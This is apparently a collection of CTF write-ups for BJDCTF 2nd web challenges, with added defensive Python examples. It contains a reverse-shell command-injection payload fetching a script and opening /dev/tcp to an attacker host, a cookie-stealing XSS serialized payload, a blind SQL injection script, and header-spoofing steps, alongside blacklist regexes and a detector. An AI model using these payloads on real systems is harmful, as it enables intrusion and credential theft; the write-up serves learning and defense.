[BJDCTF 2nd]fake google
An HTML comment hints at SSTI; exploit it directly. Reference: https://gitee.com/vulhub/vulhub/tree/master/flask/ssti
[BJDCTF 2nd]old-hack
The site favicon identifies it as ThinkPHP; exploit it directly. Reference: https://gitee.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce
[BJDCTF 2nd]elementmaster
Guessing puzzle; see the challenge author's notes: https://www.gem-love.com/ctf/2097.html
[BJDCTF 2nd]Schrödinger
Guessing puzzle; see the challenge author's notes: https://www.gem-love.com/ctf/2097.html
[BJDCTF 2nd]文件探测 (file detection)
Reference: https://www.gem-love.com/ctf/2097.html
[BJDCTF 2nd]假猪套天下第一
Log in with any username other than admin, capture the request, and the response hints at L0g1n.php.
Open that page, intercept the request and change the headers to:
time=161275398400000000
Via:y1ng.vip
Client-ip或者x-forwarded-for:127.0.0.1
Referer:gem-love.com
User-Agent:Commodore 64
From: root@gem-love.com
This yields the flag, base64-encoded.
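The step above works only because the challenge treats Client-IP / X-Forwarded-For as proof that the request comes from 127.0.0.1, and those headers are written by whoever sends the request. The Python below is an added example, not part of the original writeup or the challenge: it resolves the client address the way a service behind a reverse proxy should. The TCP peer address is authoritative; forwarding headers are consulted only when the peer is one of the application's own proxies (the 10.0.0.0/8 range is an assumed placeholder), and only the right-most hop that is not itself a trusted proxy is believed, because every hop to its left was supplied by the client.

```python
import ipaddress

# Assumed for this example: the address range of the application's own
# reverse proxies. Only these peers are allowed to speak for a client.
TRUSTED_PROXIES = [ipaddress.ip_network('10.0.0.0/8')]


def is_trusted_proxy(addr: str) -> bool:
    """True if addr belongs to one of our proxies; malformed input is untrusted."""
    try:
        ip = ipaddress.ip_address(addr.strip())
    except ValueError:
        return False
    return any(ip in net for net in TRUSTED_PROXIES)


def client_ip(remote_addr: str, headers: dict) -> str:
    """Address that an origin check may rely on.

    remote_addr is the TCP peer (set by the socket, not by the client).
    X-Forwarded-For / Client-IP are consulted only when that peer is one
    of our proxies, and then the right-most hop that is not itself a
    trusted proxy is used: every hop to its left is client-supplied.
    """
    if not is_trusted_proxy(remote_addr):
        return remote_addr
    lowered = {k.lower(): v for k, v in headers.items()}
    forwarded = lowered.get('x-forwarded-for') or lowered.get('client-ip') or ''
    hops = [h.strip() for h in forwarded.split(',') if h.strip()]
    for hop in reversed(hops):
        if not is_trusted_proxy(hop):
            return hop
    # Every listed hop was one of our proxies: fall back to the peer itself.
    return remote_addr


def is_local_client(remote_addr: str, headers: dict) -> bool:
    """The check the challenge gets wrong: is this request really local?"""
    return client_ip(remote_addr, headers) == '127.0.0.1'


if __name__ == '__main__':
    # A direct connection claiming to be local through a header is not believed.
    print(is_local_client('203.0.113.5', {'X-Forwarded-For': '127.0.0.1'}))
    # Behind a trusted proxy, the proxy's appended hop wins over the client's claim.
    print(client_ip('10.0.0.7', {'X-Forwarded-For': '127.0.0.1, 203.0.113.5'}))
```

The same rule applies to Referer, User-Agent, From and Via: they are request data, never evidence about who sent the request.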
[BJDCTF 2nd]duangShell
A directory scan finds /.index.php.swp; download it and run vi -r index.php.swp to recover the source:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>give me a girl</title>
</head>
<body>
<center><h1>珍爱网</h1></center>
</body>
</html>
<?php
error_reporting(0);
echo "how can i give you source code? .swp?!"."<br>";
if (!isset($_POST['girl_friend'])) {
    die("where is P3rh4ps's girl friend ???");
} else {
    $girl = $_POST['girl_friend'];
    if (preg_match('/\>|\\\/', $girl)) {
        die('just girl');
    } else if (preg_match('/ls|phpinfo|cat|\%|\^|\~|base64|xxd|echo|\$/i', $girl)) {
        echo "<img src='img/p3_need_beautiful_gf.png'> <!-- He is p3 -->";
    } else {
        //duangShell~~~~
        exec($girl);
    }
}
POST a girl_friend parameter; once it passes the two regex checks it reaches exec(). Unlike system(), exec() does not echo the command output to the page, so a reverse shell is the first choice, and curl happens not to be on the blacklist.
payload: girl_friend=curl http://ip/shell.txt|bash
shell.txt: bash -i >& /dev/tcp/[ip]/[port] 0>&1
Then find / -name flag locates the flag.
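The filter in index.php is a blacklist, and the curl payload shows its limit: it rejects a fixed list of words and characters and hands everything else to exec(), so any command the list does not name runs. The Python below is an added example, not code from the original page or the challenge. It re-expresses the page's two regexes, then contrasts them with an allowlist check that accepts only a fixed set of programs (ping and nslookup are assumed placeholders) with plain alphanumeric arguments and returns an argv list meant to be executed without a shell.

```python
import re
import shlex

# The page's two PHP filters, re-expressed in Python.
DENY_CHARS = re.compile(r'>|\\')                        # PHP: /\>|\\/
DENY_WORDS = re.compile(r'ls|phpinfo|cat|%|\^|~|base64|xxd|echo|\$',
                        re.IGNORECASE)                  # PHP: /ls|phpinfo|.../i


def blacklist_allows(cmd: str) -> bool:
    """True means the original index.php would pass cmd to exec()."""
    return not DENY_CHARS.search(cmd) and not DENY_WORDS.search(cmd)


# Hardened form: an allowlist. Assumed placeholders for this example: the
# only programs the feature needs and the only argument syntax they need.
# Everything else is rejected, whatever it is or is not.
ALLOWED_PROGRAMS = {'ping', 'nslookup'}
SAFE_ARG = re.compile(r'^[A-Za-z0-9._-]+$')
SHELL_META = set('|&;<>`$(){}*?\'"\\\n\r')


def parse_allowed(cmd: str):
    """Return an argv list to run without a shell, or None if cmd is not
    an allowed program with plain arguments."""
    if any(ch in SHELL_META for ch in cmd):
        return None
    try:
        argv = shlex.split(cmd)
    except ValueError:
        return None
    if not argv or argv[0] not in ALLOWED_PROGRAMS:
        return None
    if not all(SAFE_ARG.match(arg) for arg in argv[1:]):
        return None
    return argv


def allowlist_allows(cmd: str) -> bool:
    return parse_allowed(cmd) is not None


if __name__ == '__main__':
    payload = 'curl http://ip/shell.txt|bash'   # the page's payload
    print('blacklist:', blacklist_allows(payload))   # passes: nothing on the list
    print('allowlist:', allowlist_allows(payload))   # rejected: pipe and program
    print(parse_allowed('ping -c 1 example.com'))    # ['ping', '-c', '1', 'example.com']
```

The returned argv is intended for subprocess.run(argv) with no shell involved, so even a character the check missed cannot become an operator; a real deployment would additionally restrict which flags each program may take.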
[BJDCTF 2nd]xss之光 (the light of XSS)
dirsearch finds a leaked .git directory; retrieve the source with GitHack:
<?php
$a = $_GET['yds_is_so_beautiful'];
echo unserialize($a);
Build the payload from a PHP built-in class:
<?php
$a = serialize(new Exception("<script>window.location.href='URL'+document.cookie</script>"));
echo urlencode($a);
?>
// Output: O%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A115%3A%22%3Cscript%3Ewindow.location.href%3D%27http%3A%2F%2Facb23080-b56b-44a8-a4bc-63bec0ce5b81.node3.buuoj.cn%2F%27%2Bdocument.cookie%3C%2Fscript%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A27%3A%22D%3A%5Cphpstudy_pro%5CWWW%5Ctry.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A2%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7D
The flag is read from the cookie.
Reference: https://blog.csdn.net/qq_45521281/article/details/105812056
[BJDCTF 2nd]简单注入 (simple injection)
robots.txt points to a hint in hint.txt:
hint.txt:
select * from users where username='$_POST["username"]' and password='$_POST["password"]';
The username and password are concatenated into the SQL statement with no filtering at all. A username of admin\ escapes the second single quote, so whatever follows in the password field becomes SQL; the statement turns into:
select * from users where username='admin and password=' 恶意语句#';
Injection payload: ^(ascii(substr(password,1,1))>1000)#
The two different responses show this is a boolean-based blind injection, so the password can be recovered one character at a time with a binary search over the ASCII value:
import requests

url = 'http://14371858-66d2-4093-a4ba-bb14bedeeb68.node3.buuoj.cn/index.php'
passwd = ''
for i in range(1, 20):
    print(i)
    # Binary search for the ASCII value of character i over the printable range
    left = 31
    right = 128
    mid = left + ((right - left) >> 1)
    while left < right:
        data = {
            'username': 'admin\\',   # trailing backslash escapes the closing quote
            'password': '^(ascii(substr(password,{},1))>{})#'.format(i, mid)
        }
        r = requests.post(url=url, data=data)
        if 'BJD needs to be stronger' not in r.text:
            # condition true: the character is greater than mid
            left = mid + 1
        else:
            # condition false: the character is at most mid
            right = mid
        mid = left + ((right - left) >> 1)
    passwd += chr(mid)
    print(str(mid), passwd)
The recovered password is OhyOuFOuNdit; log in with it to get the flag.
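Each recovered character costs the script above roughly seven near-identical POSTs in which only the position and threshold numbers change, and the username is always admin\. That shape is what a defender can alert on. The Python below is an added example, not part of the writeup: it parses constructed application log lines (the log format and addresses are made up for this example), collapses every number in the password field to N, and reports any client that submits the same normalized password shape repeatedly, together with logins whose username ends in a backslash.

```python
import re
from collections import Counter

# Constructed application log, one line per POST to the login form.
# The first seven lines have the shape of the probes used above (the six
# thresholds the binary search visits before settling on 'O' = 79, then
# the first probe for the second character); the last two are ordinary logins.
PROBES = [(1, 79), (1, 55), (1, 67), (1, 73), (1, 76), (1, 78), (2, 79)]
LOG_LINES = [
    '203.0.113.5 POST /index.php username=admin\\ '
    'password=^(ascii(substr(password,%d,1))>%d)#' % (pos, val)
    for pos, val in PROBES
] + [
    '198.51.100.20 POST /index.php username=alice password=hunter2',
    '203.0.113.5 POST /index.php username=bob password=s3cret',
]

LINE_RE = re.compile(
    r'^(?P<ip>\S+) POST (?P<path>\S+) username=(?P<user>\S*) password=(?P<pw>.*)$')
NUMBER_RE = re.compile(r'\d+')


def normalize(value: str) -> str:
    """Collapse every run of digits to N, so all probes of one
    blind-injection run share a single shape."""
    return NUMBER_RE.sub('N', value)


def find_blind_injection(lines, threshold=5):
    """Return {(ip, shape): count} for (client, normalized password)
    pairs seen at least `threshold` times."""
    counts = Counter()
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        counts[(m.group('ip'), normalize(m.group('pw')))] += 1
    return {key: n for key, n in counts.items() if n >= threshold}


def escaped_quote_logins(lines):
    """Return the distinct (ip, username) pairs whose username ends in a
    backslash, the trick that turns the closing quote into escaped data."""
    found = []
    for line in lines:
        m = LINE_RE.match(line)
        if m and m.group('user').endswith('\\'):
            pair = (m.group('ip'), m.group('user'))
            if pair not in found:
                found.append(pair)
    return found


if __name__ == '__main__':
    for (ip, shape), n in find_blind_injection(LOG_LINES).items():
        print('%s sent %d probes of shape %s' % (ip, n, shape))
    print('usernames ending in a backslash:', escaped_quote_logins(LOG_LINES))
```

The fix on the application side is the usual one: bind username and password as query parameters instead of concatenating them into the statement, after which admin\ and the ascii(substr(...)) expression are just strings that fail to match any row.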